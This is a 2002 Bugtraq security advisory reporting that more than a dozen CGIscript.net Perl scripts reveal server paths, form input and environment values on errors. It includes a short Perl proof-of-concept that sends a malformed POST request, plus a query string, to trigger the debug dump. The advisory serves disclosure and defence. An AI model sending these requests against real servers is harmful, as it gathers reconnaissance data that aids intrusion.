14+ CGIscript.net scripts - Path Disclosure

From:	 Steve Gustin <stegus1@yahoo.com>
To:	 bugtraq@securityfocus.com
Subject: 14+ CGIscript.net scripts - Path Disclosure
Date:	 Fri, 17 May 2002 14:31:23 -0700 (PDT)

14+ CGIscript.net scripts - Path Disclosure
---------------------------------------------------------------------

Name      : 14+ CGIscript.net scripts - Path
Disclosure
Date      : May 17, 2002

Product   : csBanner.cgi
            csCreatePro.cgi
            CSDownload.cgi
            csFAQ.cgi
            CSFiler.cgi
            CSFileshare.cgi
            CSGrid.cgi
            CSIncludes.cgi
            CSMailto.cgi
            CSNews.cgi
            CSNews.cgi (csNewsPro - same filename)
            CSPassword.cgi
            CSRandomText.cgi
            CSUpload.cgi

Vuln Type : Failure to Handle Exceptional Conditions
Severity  : LOW RISK

Vendor    : WWW.CGIscript.NET, LLC.
Homepage  : http://www.cgiscript.net/


DISCUSSION:
---------------------------------------------------------------------
CGIscript.net sells perl/cgi web scripts developed by
Mike Barone and Andy Angrick.  In recent history, a
number of these scripts have been shown to have
serious security vulnerabilities and more problems are
continuing to emerge.  This plus the fact that the
unique "csScriptName.cgi" script names are easily
located with search engines makes the scripts a prime
target for attackers.  

Most recently, it's been found that almost all the
scripts will display "debug" data on errors including
server paths, form input, and environment values.

While this information by itself isn't enough to
compromise a server or application, it makes it easier
for an attacker to exploit other problems that may
exist on the server or with the application.

Additionally, because the scripts use the %in hash for
both form input and then later script or database data
it may be possible to view sensitive data by causing
the script to generate an error at a specific point in
the programs execution.


EXPLOIT: 
---------------------------------------------------------------------
Because many of the scripts use CGI.pm to process file
uploads, causing CGI.pm to die with an error would
make the script to display the debug data.  One way to
do this is to send an invalid POST request with
something like the following script:

#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data

use strict;
use IO::Socket::Inet;

my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';

my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $path\n";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--\n\n";
print <$sock>;
close($sock);

The following scripts are will generate a "debug"
error message when a cgi.pm error occurs, including
server paths, form input, and environment values.
------------------
csBanner.cgi
csCreatePro.cgi
CSDownload.cgi
csFAQ.cgi
CSFiler.cgi
CSFileshare.cgi
CSGrid.cgi
CSIncludes.cgi
CSMailto.cgi
CSNews.cgi
CSNews.cgi (pro version)
CSRandomText.cgi
CSUpload.cgi

Additional scripts can be caused to generate errors in
other ways.  csPassword for example, displays when you
make a request for: 

csPassword.cgi?command=remove

which calls a function that, while referenced by the
program, doesn't exist and subsequently generates an
error and displays the debug data.


IMPACT:
---------------------------------------------------------------------
Because path disclosure alone isn't particularly
dangerous this advisory has been rated "LOW RISK".  It
is recommended, however, that users upgrade to a new
version of the script(s) as soon as possible that does
not disclose "debug" data on errors.


SOLUTION
---------------------------------------------------------------------
Vendor has stated that because this issue is low risk
they don't intend to patch any programs right away but
will include a patch in the next major revision.


VENDOR HISTORY:
---------------------------------------------------------------------
Apr 23, 2002 - csMailto.cgi - Remote Command Execution
http://online.securityfocus.com/archive/1/269143

Apr 8, 2002 - csGuestbook.cgi, csLiveSupport.cgi,
csNewsPro.cgi, csChatRBox.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/266432

Mar 25, 2002 - csSearch.cgi - Remote Code Execution
http://online.securityfocus.com/archive/1/264169

DISCLAIMER
---------------------------------------------------------------------
The information within this document may change
without notice. Use of this information constitutes
acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no
event shall the author be liable for any consequences
whatsoever arising out of or in connection with the
use or spread of this information. Any use of this
information lays within the user's responsibility.


FEEDBACK:
---------------------------------------------------------------------
If anyone has any other CGIscript.net scripts they'd
like me to take a look at, just drop me a line at
stegus1@yahoo.com.



__________________________________________________
Do You Yahoo!?
LAUNCH - Your Yahoo! Music Experience
http://launch.yahoo.com